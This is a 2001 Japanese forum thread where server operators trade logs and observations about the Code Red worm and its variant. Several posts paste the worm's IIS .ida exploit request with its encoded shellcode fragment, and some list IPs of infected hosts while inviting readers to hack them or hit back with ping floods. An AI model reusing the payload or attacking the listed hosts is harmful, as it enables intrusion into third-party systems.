「コード・レッド」って怖いの？

【ワシントン３０日時事】新種のコンピューターウイルス「コード・レッド」が米東部時間３１日午後８時
（日本時間８月１日午前９時）から再び増殖を開始し、インターネットの機能を低下させる恐れがあると、
米連邦捜査局（ＦＢＩ）の全米電子インフラ防護センター（ＮＩＰＣ）が警戒を強めている。
ＮＩＰＣなどによると、「コード・レッド」は今月１９日、９時間で２５万台以上のシステムに感染し、
ホワイトハウスのウェブサイトにも攻撃を試みた。今回は突然変異によって危険度が増している可能性もあるという。
特に、マイクロソフト社のソフト「インターネット・インフォメーションサーバー」を使うシステム保有企業などに、
早急な対応を呼び掛けている。

明日はネットしないほうがいいのかなぁ。

■■■■■■■■■■■■　終了　■■■■■■■■■■■■

スレ乱立すな
http://ton.2ch.net/test/read.cgi?bbs=sec&key=996547695

>>2>>3
荒らしは無視。

>>3
そのスレ立てた人とは別人。
「コード・レッド」のスレないじゃん。

まぁパッチは当てときましょうね。
パッチでてるのにヤラれてDDoSに参加したら
どうにも言い訳できませんから。

>>6
どうもありがとうございます。

ＩＩＳなんか使ってる奴は氏ねという事で明日が楽しみ。

>>8
和やかに同意。

>>1
7/20にスレ立てってるよ（ｗ
アホはとっとと氏ねや！
■米でレッドコードワームがホワイトハウスを攻撃中!?
http://ton.2ch.net/test/read.cgi?bbs=sec&key=995639924&ls=50

まあいいんじゃないの >>10

今日IISで被害受けた人は書き込んでくれ〜。（管理人）
又は今日メールサーバーが使えなくなった人もプロバイダー名を書いてくれ。（ユーザー）

メールじゃないや、Webだ。

おしえてあげるＹＯ
ttp://people.site.ne.jp/2001/2001.html

て優香、うちの会社のサーバー（Linux）に、「…（略）default.
ida?NNNNNNNNNNNNNNNNNNNNNNNNNNN…」ってアクセスが２、30分
おきにある、（あった）７／２０ときのう。IPはまったく正体不明。
問題おきないとは思うけど、ウザイなあ…、あ、ちなみにうちの会
社はホワイトハウスではありません…ホワイトハウスってラブホが
Ddos攻撃受けてたら笑っちゃうけど…

黄土劣土逝ってよし
http://www.codered.org/
http://www.code-red.co.uk/
http://www.code-red.de/
http://www3.airnet.ne.jp/codered/
http://www2.to/codered/

http://www.metallic.co.jp/support/trouble/index.shtml

http://www.interlink.or.jp/notification/backno/2001/trb025.html

>>11
あんま関係ないかもしれんが、8/1はYahooMailが不調だったな
コード・レッドの集中攻撃くらってレスポンスが落ちたのかな？

#YahooはBSDだぞとかいう厨房レスつけた奴は殺す

おいおい！
コードレッドでひどい目にあったよ。
データ送出しっぱなし。
ログも満杯。

おかしいおかしいと思ってたら
コードレッドが入り込んでいやがった。

>>14
default.
ida?NNNNNNNNNNNNNNNNNNNNNNNNNNN

そうそう、これこれ。
連続送出してるからパケットアナライザで調べたら
このコードあったね。
これで始めてワームの仕業って解った。

兎に角さぁ、IISかどうか確認してからやってくれよぉ・・・
Apacheだって、何度も言ってるだろ？

まだ来てるよ・・・ったく、アホらし・・・
一生やってろ

>>18
YahooはBSDだぞ

>>22
イタすぎ（ﾜﾗ

>>22=>>23
自作自演イタイ

>>24
(違) 更にイタイ

俺もまぜてくれよ

>>26
んじゃ、IISの鯖用意して、IP晒せ

無邪気な>>23-25に言ったんだよ。CodeRedはもうお腹いっぱい。
これ以上来なくていい。つーかIP晒してどうする

>>28
おっ俺 >>22 だけど入ってない（嬉

あっ、しまった。　　・・・しまったってことも無いな・・

もう寝ようや

>>31
今夜もNの嵐・・・鬱
あぁ、HDDの無駄・・・

実はこのウイルスIISのユーザの嫌がらせかもよ。（藁

>>33 激しく同意

東京めたりっく、コードレッドの実害大。

ところでさあ、きょうLinuxのログ解析しようと思ってtxtファイルに（ログを）落としてAccessでインポートしようとしたら、コケるんだ、Accessが…何回かトライしたら、dllのレベルでこけちゃうらしい…もしかしてIISに限らずMSのオブジェクト、すべて対象になっちゃう？

>>36
んなあほな。

>>36
一回CSVをエクセル形式にしてからインポートすると
うまくいくという伝説がある

>>36 そのログ何MBあるの？

昔Office97のAccess、Excelで5MBのログ解析をやったら激遅。
analog、wwwstat だと激速！
個人的には、analog か grepで必要な情報見た方が速いと思うが。

お騒がせスマソ…

ログは何メガもない。また、txtの段階で必要な行（NNN…を含む行）
のみ抽出したので、２，３０行くらい。Excelなら読めた。どうやら
Accessがヘンなのかも…再インストしてみるよ。

Excelからのインポートもだめだった。でもなんか気になる…

/default.ida?NNNNNNNNNNNNN…
の発信元のサーバーってなぜ韓国が多いんだろか？
パッチ当ててないヴァカ技術者が多いんだろか？

発信元を調べるとFirewall-1経由のやフィルタが掛かっててたどり着けないのも有ったから、確信犯かもしれないよ。

糞コードレッド氏なす！花金がつぶれた

花金・・・おっさんの匂いがする。近くにいるな

44>ﾏｼﾞﾃﾞﾂｯｺﾑｵﾏｴﾊ･･･

それよかw2kにM$のパッチ当てたらiriaが止まるようになったよ
余所への過剰なhttpを無差別に押さえ込んでるんじゃなかろうな

>>39-40
そんなん、Access、Excel、analog、wwwstat 使うほどの量か？（藁
grepして、流し見で充分・・・
大体、どう解析するわけ？（藁

>>47
激しく同意
コードレッドにかぎらず
httpのアクセスログには解析する余地が無いな

いいかげんウザイ。
漏れのserverはトラフィックが少ない。
が、その半分がクソIISクソ管理者のおかげ。
もう何個あるのか数えたくも無い。
誰か数えろ。
つーかこのIPハッキングの実験にでも使ってくださいな。
どーせクソ管理者（藁


24.229.50.49
24.112.33.216
211.45.212.222
210.90.239.193
210.177.143.81
213.11.82.35
211.61.184.185
211.23.232.182
148.208.143.4
61.135.110.130
216.76.15.171
213.84.215.2
210.219.86.172
217.15.64.198
64.242.115.165
195.178.183.203
216.53.74.93
195.122.185.132
216.16.224.130
206.153.58.147
163.121.197.150
208.57.255.99
62.161.74.159
210.201.72.136
205.205.100.19
203.169.156.130
210.205.191.50
203.58.197.228
211.223.14.137
63.205.131.29
217.126.69.227
210.85.56.233
212.175.156.35
211.56.9.99
24.12.165.106
24.250.22.176
211.67.218.60
210.102.1.87

>>47-48
解析、ってわけじゃないけど、ここに出てるIPとか、おれんとこに
来たIPとかをマッチングさせて、何かの規則性があるか調べようと
した訳。

209.183.213.143
64.52.176.208
203.248.215.5
61.170.151.202
61.134.82.99
62.161.74.159
210.201.72.136
205.205.100.19
203.169.156.130
210.205.191.50
203.58.197.228
211.223.14.137
63.205.131.29
217.126.69.227
210.85.56.233
212.175.156.35
211.56.9.99
24.12.165.106
24.250.22.176
211.67.218.60
210.102.1.87
209.183.213.143
64.52.176.208
203.248.215.5
61.170.151.202
61.134.82.99
211.171.1.148
203.235.112.136
157.238.133.154
24.161.172.55
203.141.149.36
194.206.162.113
170.210.247.130
202.21.5.72
65.28.239.152
61.157.93.159
195.162.177.53
216.219.45.18
24.253.66.33
210.102.212.10
209.239.214.144
213.46.214.189
211.214.203.235
203.126.139.146
203.204.8.137
203.67.77.171
63.111.243.186

>>50

規則性って・・・一体何万個のIPを調べる気？（ﾜﾗ

しかし、Code Red のアタックって
飽きもせずに来るねえ。

飽きる事無く作業を続けるのが機械だからね。

>>50
ﾊｧ？規則性・・・あるわけねーだろ（藁
世界のお馬鹿IISのIPアドレスは、散在してるっちゅーの

>>53
飽きずにって・・・ワームが広がってんだから、飽きる・飽きないの問題じゃねーだろ？

こいつら、何が起こってるかわかって書いてるのか？（呆藁

俺、温和な人間なんで、あんまり怒んないんだけど…

>>55
「規則性…あるわけねーだろ…」って言ってるけど、絶対ないってどっか
で情報得てるわけ？技術者だったら、未知の現象に対して、なんらかの法
則なりがないかどうか、時間が許せば（ヒマなら）調べる位の姿勢（好奇
心程度かもしれんが）、あってもいいんじゃないの？

ていうか、しょせん２Ｃｈていわれればオシマイだけど、人の意見に公共
の場（しょせん２Ｃｈかもしれんけど）で「ちゅーの」とか「ねーだろ」
って口調は、よくないんじゃないですか？

皆さんどう思われます？ここはコードレッドについて語る場であって、こ
んなこと書くべきではないとも思ったのですが…つい

>>55
＞散在してるっちゅーの
＞問題じゃねーだろ？
だめ！絶対駄目！！

＞散在してるっつーんだよ！あﾞ？
＞問題じゃねーんだよ！
これならＯＫ。

規則性調べるよりテスト用サーバーに感染させてプロセスに
アタッチさせてコードを見た方が早いと思われ。

>14
ＭＸで逆アセンブルしたソース見かけたよ。拾って、解析してみれば？
でも、規則性なんか調べてどうすんの？（笑）

規則性って、乱数でしょ。
で、乱数なんだけど種が固定なので、IPアドレスによっては
ぜったいにアタックされないと。

>>56=14
非常識＝アホ丸出し

>>14
未知の現象ってなんだ？（ｗ
そんなことやってるヤツは技術者失格＋解雇だな（ｗ

夕方になって
GET /default.ida?NNNNNNNN.. が
GET /default.ida?XXXXXXXX.. に変わった。

>>63
そう?私のところは今までと変わらん。

って，ひょっとしたら亜種が作られたのかもしれんな。
IISなんて使ってない(使えない)からいいが，もう少々，
状況を静観する必要があるな…

うん、あきらかに亜種だね。たった今リクエスト捕まえてみたら、今まで

GET /default.ida?NNNNNNNNNN（略） HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
Accept: */*
Content-length: 3569

こんなリクエストだったのが、

GET /default.ida?XXXXXXXXXX（略） HTTP/1.0
Content-type: text/xml
Content-length: 3379

こんなんが出てきてる

>>63
うちもだよ。

このログはPerlで書いた偽HTTPDで取ったもので、
リクエストが来た瞬間にBeep音が鳴るようにしてあるんだけど、

>>65のやつはほぼ同時に来た。ちなみにホストは別、
上の従来の奴は
[20:32:15] usgm012n085.ppp.infoweb.ne.jp(61.124.69.85)
下のXになってる奴は
[20:32:13] cj3147636-a.kkbnj1.kt.home.ne.jp(210.20.199.105)

2秒差って所がちょっと気になる。どうでもいいけどJ-COMで
鯖たてるなよ・・・。俺は我慢してるってのに

NT4でセキュリティパッチ（２つあるうちのひとつ）あてたら
キー入力が変になった
同じ文字がだぶるのでログオンに苦労したけど、削除したら直った

ログ見張ってたら，私のところにもGET /default.ida?XXXXXXXXが来た。

なんっーか，リアルタイムで状況が進展しつつあるな。w

なんかXの奴の勢い凄くないか？

Xくん，1分も待たずに次のが来るぞ...うちのApacheくんも
凄い勢いで大容量ログを吐いてきやがる。ゲロゲロ。

うちも２０時後半から３分おきに来てる<X版

X君、8時ぐらいからやたら増えたね。うちJ-COMなんだけど、
やたらJ-COMユーザーからのアクセスが多い。つーかほとんど

NからXに変わって、ステータスコードも変わった（藁）
(Apache 1.3.20)

>>14
もう既に的確な回答が出てるようやけど、
まだ、なんか文句ある？

>>75
ﾏｧﾏｧ　むし返すのはやめときなさい

XXXXバージョン、うちにもきた。krから。

xxxxバージョンもnnnも来ているがxxxのほうが圧倒的に多い

XもNも、Content-Lengthが全然あってないのは何故だ？

Xくん。さっきうちにも来た。
worldbank.orgより。大丈夫か世界銀行(藁

>>78
激しく同意。21時以降はXXX:NNN=9:1くらい。

失敬。パケットダンプしたらすぐわかった。
でもGETなのに・・・、どうも釈然としない。

それはともかく、Nにあった

c:\notworm LMTH
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=english">
<title>HELLO!</title></head><bady><hr size=5><font color="red">
<p align="center">Welcome to http://www.worm.com !<br><br>
Hacked By Chinese!</font></hr></bady></html>

の部分が、Xだと無くなってるね。

XXXXX は 19:30 に最初のが来てからもう45件。
NNNNN の方は今日一日で25件しか来ていないのに。

で、たった今こんなのが来たんだけど、ナニこれ？
Code Red とは関係なさそうだけど、408 ってなんだ？

211.22.89.222 - - [04/Aug/2001:22:42:58 +0900] "-" 408 - "-" "-"

ついでにXの方のパケットダンプ眺めてたら、Nには無かった

RegQueryValueExA
RegSetValueExA
RegOpenKeyExA
RegCloseKey

こんな記述が。いったいどんな亜種になったのやら・・・。
ざっと見た感じだと、大幅に書き換えられてる気がする

>>83
http://nttcom.e-words.ne.jp/r-httpstatus.htm
ステータスコード。

default.idaって名前でHYBRISとかの実行ファイル
を置いておくとなんか起きるのかな。

・・・・・・・

つーか「コードイエロー」？？（藁

>>86
案外サーバ側で実行されたりしてな。

案外も何も・・・

ばかなの？

ばかなんでしょうね

XXXXXX は日本からがやたら多いぞ。今までにうちに来た50件のうち、
zaq.ne.jp が14件、mesh.ad.jp が5件、その他国内 ISP が数件。
攻撃対象の選び方が NNNNN のときと変わってたりする？？？

zaqd3872362.zaq.ne.jp
zaqd3874f19.zaq.ne.jp
zaqd38742fa.zaq.ne.jp
zaqd3872023.zaq.ne.jp
zaqd3872023.zaq.ne.jp
zaqd387438b.zaq.ne.jp
zaqd3871dcf.zaq.ne.jp
zaqd3873f2d.zaq.ne.jp
zaqd3872362.zaq.ne.jp
zaqd3874f19.zaq.ne.jp
zaqd3874f19.zaq.ne.jp
zaqd3871dcf.zaq.ne.jp
zaqd387202d.zaq.ne.jp
zaqd387202d.zaq.ne.jp
ctk28ds12.tk2.mesh.ad.jp
ctk219ds13.tk2.mesh.ad.jp
ip1a0485.hkd.mesh.ad.jp
ip1c0860.tky.mesh.ad.jp
ip1c0985.tky.mesh.ad.jp

HYBRISじゃなくてワクチンソフトを置いておけば、
アタックを仕掛けてきたマシンからウイルスを
消せるとか？

やっぱりばかなんでしょうね

俺J-COMなんだけど、J-COMユーザーからのアクセスが
やたら多い。対象とするIPの規則が変わったかな

>>94
おぉ！それいい案♪
是非、ワクチンソフト作って！

つーか、今回これで、Windows鯖激減するな・・・

トレンドマイクロ、シマンテック様各位


ご承知のとおり、マイクロソフト社の「インターネットインフォメーションサーバー」が猛威を振るっています。
至急、弊社のアンチウイルスソフトで「インターネットインフォメーションサーバー」を駆除するようにしてください。


宜しくお願いいたします。

>>97
同意。
Windows鯖が減少するというか、IISが減少。
まぁそれでWindows鯖が結果的にすくなると思うが・・・
本当に鯖立てたいやつはApacheにするだろう（藁

一気に４７回アクセスされたぞ…
まったくやめてくれよ。

8、9時台は日本からのアクセスばっかりだったけど、
今ニュージーランドからもXバージョンが来た。

XXXXX はほとんどが 211.xxx.yyy.zzz からだな。
うちのところには今までに XXXXX が50ちょっと来てるけど、
61.aaa.bbb.ccc からひとつ来た以外はぜんぶ 211.xxx.yyy.zzz だ。

うちは210からがほとんど。他からもちょこちょこ来てるけど

よく見たら自分(eAccess+BIGLOBE)の IP アドレスも 211.135.yyy.zzz だった。
NNNNNN は乱数だったけど、XXXXXX はインクリメントしながら順番に叩いてるのか？

>>99
そしたらApacheが標的になるんじゃない？
要はいたちごっこなわけで。

>>84
俺もダンプ取って見た

・GetSystemDefaultLangID
まさかわざわざ言語設定までチェックしてなんかやってんのかね

・CMD.EXE

・d:\inetpub\scripts\root.exe
・d:\progra~1\common~1\system\MSADC\root.exe
なぜDドライブ？

EXPLORER.EXE
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SFCDisable
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots /Scripts

怪しい記述が多すぎ。確かに以前のコードとかなり違う感じ

だんだん海外からのX君が増えてきたな

>>104
多分そんな感じだろうね。おれJ-COM@Nethomeなんだけど、
同じNethomeからのアクセスがほとんど。だからIPはどれも210

>>105

Web Server のシェアは、Apache が６割。IIS が ２割強。
Apache だって標的になっているはずだが、せいぜい WEB
ページの改ざん(それも、Apache 自身ではなく、OSの脆弱
性をつく)まで。IIS ほど、ワームが作りやすい状態じゃないし。

IISは構造的に欠陥だらけなのよ。

>>109
激しく同意。
あと、NT,2000＋IISを立てる人間は、スキルの無い人間が多いというのもある。
（今回のワーム拡散原因）

code redとsadmindをまぜた感じかな。
d:なのはsadmind対策でc:から別ドライブに移しているのが
あるからかもしれないがd:にcmd.exeがなきゃ意味ないし、
なぞだな。

あのー。
XXXと本来の訪問者の比が
XXX＞＞＞＞＞本来の訪問者
なんですが。どうしたら良いでしょうか？(藁

おっ、久しぶりにNが来た

>>112
ﾜﾗﾀ・・・
もう電源落としたら？

NNN と XXX って、突いてくるセキュリティホールが同じなだけで、
もしかして、ワームとしてはまったく別物だったりします？

Apacheのログ見てて気づいた。
XXXXXXだと404で、
NNNNNNだと400返してる。
この違いって？？

FreeBSD(98)4.2RELEASE+Apache1.3.17

ブロードバンドスピードテスト
計測結果
測定サイト http://speedtest.pos.to/
測定時刻 2001/08/04(土) 23:50:33
回線種類 ADSL
回線業者 NTTフレッツADSL
プロバイダ ******
データサイズ 16.762kB
伝送時間 19.49秒
ホスト1 WebARENA 1kbps
ホスト2 WebARENA(2) 7kbps
ホスト3 pos.to 8kbps
ホスト4 pos.to(2) 1kbps
推定スループット 0.9kB/s
推定スループット 7kbps
コメント NTTフレッツADSLとしては遅いです。
設定や回線を見直してみてください。(5/5)

もういや

既出

ｺﾞﾒｿ

でもなんで・・・？

>>115
まったくってことは無いだろうけど、ダンプ見てみると
NとXじゃずいぶん違ってる。

どーでもいいけど、Code Red スレ統合しません？
同趣旨のスレが上の方にいくつも…。

>>120
したいけど無理でしょ

>>121
・・に同意（悲

Ｘバージョンってなにやってんだろ、結構やばそうだけど。
誰か感染してみてくれない？
月曜日は大変かも。

もしかして先客としてNがいたら、Xに書き換えるとかやってんのかな。
いくらなんでもXが多すぎる。

３０分の間に２０回も叩かれた。今夜は虫のお祭りか？

誰かニュース速報板に Code Red スレたてて！

XXXになってからZZZは一回も来てない
XXXって２回づつ叩かれてませんか？
どうですか？

同じプロバのダイヤルアップのヤツからも来た。よほどうんの悪いやつだなぁ。
合掌。

>>126
もうたってるよ
http://kaba.2ch.net/test/read.cgi?bbs=news&key=995985124&ls=50

オレも自分のＩＰは　???.???.???.117　だけど
同じプロバの　???.???.???.28　から攻撃が来た・・・
悲しいよ・・・

先週の訪問数から考えるとすごい勢いで増えてるよ〜。
XXX になってちょっと頭良くなったみたい。ルーターの
ポート閉じようかしらん。

被害者なの？この人たち。
ftp.sorionline.com
210.183.126.136
193.c210-85-165.ethome.net.tw
h199.p486.iij4u.or.jp
tpfa2231.246.ne.jp
lr01pool50.usiwakamaru.or.jp
d228185.ppp.asahi-net.or.jp
210.119.226.247...etc

stream1.mbeat.com からいらっしゃいました。
ストリームサーバがヤラレちゃってるって、だいぶｲﾀｲのでは．．．

あ゛ー
これが何かすごい事件の引き金になってくれれば IIS なんて使う奴
いなくなるのに...。

どうでもええが固定 IP でもないのに 3〜10 分に一回のペースに
なってきたぞ。訳もわからず IIS 立てたテレホ厨房がわんさかと
接続中といったところか。

台湾、中国、露西亜、韓国、亜米利加、うーん国際色豊かだ (藁

さっきから同じプロバイダがやたら目に付くんだが、自分の
グローバル IP の隣接 IP から始めてんだろうか？

もうﾊﾞｶは回線切れって感じ

コレのせいか・・・・。マジびっくりしたヨホント。
てっきり狙われているのかと思ったっす。
無料二つ使ってんだけど接続の度に必ず80をたたいてきて・・・。
ああ・。鬱だ。

Code Redって先月(7/19)の第一波の時のは
感染したマシンがwww.whitehouse.govにDoSかけたんだよね
今のXXXXXタイプって感染後の増殖自体はは相変わらず
やってますが、その後のDoSとか、感染後の挙動は何か変わって
るんでしょうかねー？

そっちも結構気になるかも
帯域食われるの嫌で。。。

IIS入れてないWin2kもＸ型はやばかったりして･･･
つーか異常な多さだ。世界中でやってたら大変だな

で、ポート８０を叩いてきたのはそのコードレッドって奴で合ってますか?
すんません。

合ってます

MSのサイトに

>>IIS は多くのアプリケーションに自動でインストールされます

って、あるんですけど、IIS入れてないつもりでも､
勝手にインストされてるってことあるんでしょうか？
こわいから、パッチ当てました。

ありがとう。でも何故か裏ニュースパケット送ったみたいなんだけど。。。
しかも自分では行ってないのに・・・。やっぱりウイルスとか感染してんのかな。
ウィン９８

CodeREDの感染、うっとおしかったのですが、相手先がまぁ同胞の県内だったとこもありメールで管理者へ私信を投げました。
自分も含め固有の情報がしっかり書いてあるんですが、OEを使っているんで、メールのつもりが某ニュースへ放り込むという体たらく。双方の馬鹿さをさらけ出してしまいました。投稿ミスを削除したんですが、ニュースから消えてくれません。
私逝くべきでしょうか？　死にたいです。はぁ＾〜。。。

既出かもしれないですが
一応Code Redスキャンアプリ公開されています
http://www.eeye.com/html/Research/Tools/codered.html
http://www.eeye.com/html/Research/Tools/CodeRedScanner.exe

心配だったらスキャンしてみたらどうでしょう

>>141
apacheのprot80つかってるんだけど
違うprotにしたらいいかな？

>>142 IIS も Apache も立てた覚えが無いなら、下のリンクをクリックして
「ページを表示できません」「サーバーが見つからないか、DNS エラーです。」
と出れば安全。

http://localhost/

# と言ってる間に香港からの客人が NNNN と...

>>146
いや、Apacheならなんの問題も無いけど

>>147
おお。ありがとうございます。
「安全」でした！

ただいま自宅のアパートです。
会社のサーバが心配なんだけど、外から Code Red に感染しているか
分かる方法ありますか？

今日はお祭りですか？ (藁

>>150
管理者？

>>150
１４５の身になってやれよ．．．

>>150
ログ見ようね。

ちょっとあのスキャンツールで変なことが分かりました

今まさにGET /default.ida?XXXXXXXXX
これ投げてきた相手のアドレス範囲にScanかけたんだけど
検出できなかったです

どしてだろ？Pingも通るんだけどね。ついでに
nmapやってみたけど（汗　ガバガバPortあいてる。。。

>>148　logを埋めるだけか。サンクス
陰気な国だ

既出かもしれんが、感染対象となるIPアドレスの求め方。
http://www.zdnet.co.jp/help/howto/security/v03-1/index.html

>>157
今日のXはそれともまた違うような気がするんだよな

しかし、DoSアタック行う時期になったらどうすんだ・・・この勢い・・・

初心者だから　よくわからないけど、
IISが腐ってるのか　それともMSが標的にされてるからあら探しされてるのか　どっちなのかな？

IISが腐ってます

本年度の新人賞をあげたいくらい。
性別で言うとCodeREDは女？若い？

本年度っつーか、モリスワームも超えたんじゃないか

>>155　偽造IPなのでは？
おいらが聞いた話では９割偽造だよんって聞いたけどデマ？

>>164
パケットの送信元 IP を偽造したところでルーティングが狂って
TCP のセッションを正しく確立できなくなるだけ (ACK が返っ
てこない)。ルーターに感染するウィルスならまだしも IIS に
感染するウィルスがパケットの IP 偽造はやらんだろ。少なくとも
俺はそんな作業かったるくてやりたくねー。

どでしょ？
確かにソースアドレス偽造してアタックかけるのは
一般的だと思いますけど、Code Redは攻撃（っていうか感染）
する時に自分のアドレス偽造してるのかなあ？
これも前回のNNNと今回のXXXで違うのかなあ？
どなたか情報もってますか？

Code読んで解析するのが一番早いのでしょうけど
（ちょっと解析仕方わからなくて。。。）

Xのリクエストヘッダは基本的に

GET /default.ida?XXXX(略)%u00=a HTTP/1.0
Content-type: text/xml
Content-length: 3379

って感じだったけど、寝る前にログ見直したら

GET /default.ida?XXXX(略)%u00=a HTTP/1.0
Host: aaa.bbb.ccc.ddd
Content-type: text/xml
Content-length: 3379
Cache-Control: max-stale=0

ってのが出てきた。Hostのアドレスには、俺のIPが入ってた。
ちなみにうちは当然IISなんか立ててない。何故だろうか

で、たった今、210.20.60.198から

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Host: 210.20.60.198
Content-type: text/xml
Content-length: 3379
Cache-Control: max-stale=0

が来た。でかいコピペですまんが、何だこれは？
リクエストメソッドすらないじゃん

まあとにかく、Xって言っても何種類かありそうだね

時間的にレス付かないだろうから寝る。おやすみ

CodeRedアクセスしてくるサーバを、別のセキュリティーホールをついて落としたら、犯罪ですか？
こんなに騒いでるセキュリティホールを塞がない奴だから、きっと他のも対策してないと思うのだが。。

Ｘ版の勢いがすごいですね。日本からのアクセスが多いのは何故？　日本産？

学校のサーバーのログを見てみたら
05/Aug/2001:00:40:00ぐらいから
X版が大量に

いかんなぁ…ログ見るからに状況がどんどん悪化している気がする。

怠慢な管理者がこれほどまでに多かったとは。

うちも 68%がX版になったよ。

勢いの鈍ったCode Red
http://news.yahoo.co.jp/headlines/sbn/010804/cpt/12290000_zdnet002.html

>>174
事態は刻々と変化しています

>>174
うちは今までに 134 匹来てるよ。
専門家の予測とやらはいつもあてにならんな。

>>174
けさ５時過ぎからでのべ37。お祭り状態です。。。

ゾヌのアラームが今日は一件しかありません。
みんな騒いでるのになぜうちには来ないのでしょうか？
ちなみにプロバイダはゼロです。

>> 174
うちは 169匹です。特に今日は凄いペース。

プロバイダは東京めたりっく通信。

BlackIce、警報鳴りっぱなし

http://www.geocrawler.com/lists/3/SourceForge/4890/0/6330369/

８時ごろから数えて４０件ぐらいアタックが来てんだけど、
やっぱコード・レッドのせいですか？
俺さっきからpingうちまくって対抗していたのですが・・・(鬱藁

>>182
多分ね。
言い方を変えるとHTTPポートプローブ。
今、こうやって書いている途中でも警報なるぐらいだから。

９０分で４２アタックです。
これのせいか知らないけどめちゃくちゃ重いです。

うちは90分で82アタック。殆どバ韓国から。

うちはとうとう200超えたよ。

ついに300を超えた。
つーかコレ
211.196.153.192４０回以上連続アクセスってどういうこと？
ﾏｼﾞでクソIIS、クソ管理者をくたばらせる方法を考えないと・・・

鯖立ててないんだけど8月5日分だけで100超えたっす。
普段なら一日数回なんだけどねぇ。

昨日は前夜祭だったのか。
今日は凄まじく来てるよ。
こんな短文打ってる間に２回来るんだよ。
誰かなんとかしてくれ。

今日の0:00〜12:00の間だけで250回。
すさまじい勢いだ。

>>189
私のところも同じです。
今日は特にひどい・・・
数分に1回は来ますね（藁

>>189
昨日より今日、今日より明日、といった感じで19日まで
はずっと続くんでないかなぁ。

知らずに仕返しにpingを数十万回打ったよ。

何かさ、アドレスの先頭が211.で始まる奴ばっかりから来るんだけど。

Nは小康状態だけど、Xは凄まじいな。

ウチのログはこんな感じで確実に増加してるＹＯ！
ttp://www.geocities.co.jp/SiliconValley-Cupertino/9922/
ウチは自作ISAPIフィルターかましてるので
CodeRedに擬態して接続すれば首吊りモナーＡＡが拝めるＹＯ（ｗ

8/01 3
8/02 38
8/03 35
8/04 48
8/05 97 (ただし１３時まで）
logにホスト名が無い場合が多いので、ISPからのDial-up userが多いと思われる。
このレベルのユーザーにパッチを当てる作業は期待できないので、この問題は
しばらく続くと思う。
次の亜種で、感染したホストがクラッシュするようにでもなれば、そこでユーザ
はやっと気がつくんじゃないの。(そうなった方が、Network上の資源を食いつく
されるのが終るので、ありがたいけど。）

なんか昨日からたくさんきますが未だにCodeRedが一体どういう
ものかが理解できません。。
色々検索して調べてみてはいるのですが、言葉が難しいです。
むちゃくちゃ簡単に言うとどういうものなんでしょうか？

Zoneだからリクエスト見れないんだけど、昨日辺りから
中国語とか日本語が増えてない?
XXXXXの方はJPもヤバイのか、、ほぼ2、3分おきにノックされて
作業出来ないよ　　(鬱

ログをみてびっくり。殆どXXXだ(爆
0時-12時で112件。
NNNは方々から来るがXXXは210.*.*.*からしか来ないぞ。
うちの鯖が210.*.*.*だからか？
どうやら同じ第一オクテットのIPにだけ送出するようだな。
手当たり次第に打つよりは感染の打率は上がるわな。考えたね。

>>197
ワームだよ。サーバのバグを利用してサーバ同士に伝言ゲームをやらせる。
「この台詞と同じ台詞を多くのサーバに伝えろ」って感じ。どお？

>>200
うまいね。で、穴のあるIISは伝言ゲームに
参加するってわけ。穴のないヤツは無視する
けど伝言ゲームのお誘いのメッセージはログ
にちゃんと残っているから、プロバイダに
報告するとイイかも。

ちょっと実験してみたら感染してるやつは殆ど01-025も放置しとる(;´Д`)
ああああああああああああああ〜〜〜

Hacked by chineseってindexの中華鯖　┐(´ー｀)┌
なんだかなぁ・・・

確かにすごい数だね。
うち２〜３０回/分位きてる。
この位、WEBにアクセスがあると、
頑張ってWWWも書くんだけどなあ。

最初びびったけど、原因が分かったら気にならなくなった。
だけど、これから、まだ増えるんだろうねえ。特に盆休みが
始まるから対策が遅れそう。
つーか、サーバー立ててる奴、管理してる奴、もちっと、
しっかりしてくれよ。

http://www.incidents.org/ に NNN タイプと XXXタイプの違いが報告されている。
XXXタイプはバックドアを仕掛けていくらしいぞ。

やられちゃったヤツって、わざわざM$に
お金払ってまでして何やってるんだろうね。
Linux+Apacheならタダ同然でCode Redも
関係ないのに。

レンタルサーバー借りてて昨日から変なアクセスログ＆エラーログが
CodeRedとかいうワームのせいだったのか・・。
昨日の深夜から今も。2分おきぐらい。61からはじまるのが
多いです。

こういうのは、相手の管理者に連絡してあげたほうが
親切なのかな？

Linux+Apacheに乗り換えたら、システム管理の仕事が減ってしまい、
残業と休日出勤が無くなる上に、UNIXわからないからシステム管理者の
抵抗が激しいです。

>>210
だからよ、そうやって残業代と休日出勤手当てをあてにするから、
この業界はいつまでたってもだめなんだYo！
残業や休日出勤するヒマがあったら、勉強してくれ。
話がそれたのでsage

>210
ApacheのほうがIISほどパッチ当てるの簡単ではないので
Apacheに感染するCodeREDタイプのワームが出現したら
今回の比ではないくらい繁殖してしまうのでは。
いまでも古いままのApache使ってるサイトは非常に多いです。
# ちなみにUNIXわからないシステム管理者ってなに管理してるんすか?

GUIから操作できる“統合化された”ＭＳの製品って、
確かにとっつきやすいよね。
でも、とっつきやすさが大切なのは初心者だけ。

プロにとっては、スクリプトで操作したり、単機能な
製品やコマンドを組み合わせた方が簡単快適で作業も高速。

少し勉強するだけで、MSの統合化された製品（バグと
制限事項だらけ）から開放され、快適な世界で仕事が出来
るんだけどな。

会社が労働時間（どれだけ働いたか）で給料を払っている
うちは、早く仕事を終わらせても評価されないからだめかな。

そういう会社は、早く淘汰されてください（わら）
ITバブル崩壊マンセー。

>> 212

ハア？

どこが難しいんだよ。

IISはパッチあてると動かなくなるソフトが怖いから検証が大変だぞ。

その点、Apache は独立性が高いから問題は起きにくい。

>>208
うちも６１からはじまるのばっかデス。
一週間ぐらいまえにZAいれたばかりなので・・・
って書いてるあいだに２回もきた。。

>いまでも古いままのApache使ってるサイトは非常に多いです

